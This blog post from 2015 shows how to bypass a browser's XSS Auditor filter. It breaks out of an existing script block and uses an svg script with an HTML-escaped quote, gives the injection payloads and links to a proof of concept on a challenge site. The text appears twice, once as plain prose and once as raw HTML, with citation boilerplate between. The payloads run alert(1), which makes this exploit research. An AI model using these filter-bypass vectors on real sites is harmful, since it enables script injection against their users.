XSS Auditor bypass

XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this:


<script>x = "MY INJECTION"</script>


As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so:


</script><script>alert(1)+"


You could of course use a standard ",alert(1)," but what if quotes are filtered? I then came up with the idea of using SVG and an HTML escaped quote. This bypasses the filter and is a HTML XSS vector that doesn’t have a DOM vulnerability so it’s within scope of the filter and is very common in my experience. Here is the final vector:


<script>
x = "</script><svg><script>alert(1)+&quot;";



XSS auditor PoC

Print Share Comment Cite Upload Translate

APA

() » XSS Auditor bypass. Retrieved from https://www.truth.cx/2015/02/10/xss-auditor-bypass/.

MLA

" » XSS Auditor bypass." - , https://www.truth.cx/2015/02/10/xss-auditor-bypass/

HARVARD

» XSS Auditor bypass., viewed ,

VANCOUVER

- » XSS Auditor bypass. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2015/02/10/xss-auditor-bypass/

CHICAGO

" » XSS Auditor bypass." - Accessed . https://www.truth.cx/2015/02/10/xss-auditor-bypass/

IEEE

" » XSS Auditor bypass." [Online]. Available: https://www.truth.cx/2015/02/10/xss-auditor-bypass/. [Accessed: ]

Select a language: Afrikaans Albanian Arabic Armenian Basque Bengali Bulgarian Catalan Cambodian Chinese (Mandarin) Croatian Czech Danish Dutch English Estonian Fiji Finnish French Georgian German Greek Gujarati Hebrew Hindi Hungarian Icelandic Indonesian Irish Italian Japanese Javanese Korean Latin Latvian Lithuanian Macedonian Malay Malayalam Maltese Maori Marathi Mongolian Nepali Norwegian Persian Polish Portuguese Punjabi Quechua Romanian Russian Samoan Serbian Slovak Slovenian Spanish Swahili Swedish Tamil Tatar Telugu Thai Tibetan Tonga Turkish Ukrainian Urdu Uzbek Vietnamese Welsh Xhosa <p>XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this:</p> <p><code><br /> <script>x = "MY INJECTION"</script><br /> </code></p> <p>As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so:</p> <p><code><br /> </script><script>alert(1)+"<br /> </code></p> <p>You could of course use a standard <code>",alert(1),"</code> but what if quotes are filtered? I then came up with the idea of using SVG and an HTML escaped quote. This bypasses the filter and is a HTML XSS vector that doesn’t have a DOM vulnerability so it’s within scope of the filter and is very common in my experience. Here is the final vector:</p> <p><code><br /> <script><br /> x = "</script><svg><script>alert(1)+&quot;";<br /> </script><br /> </code></p> <p><a href="http://challenge.hackvertor.co.uk/script2.php?x=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2B%26quot;">XSS auditor PoC</a></p> First name:

Last name: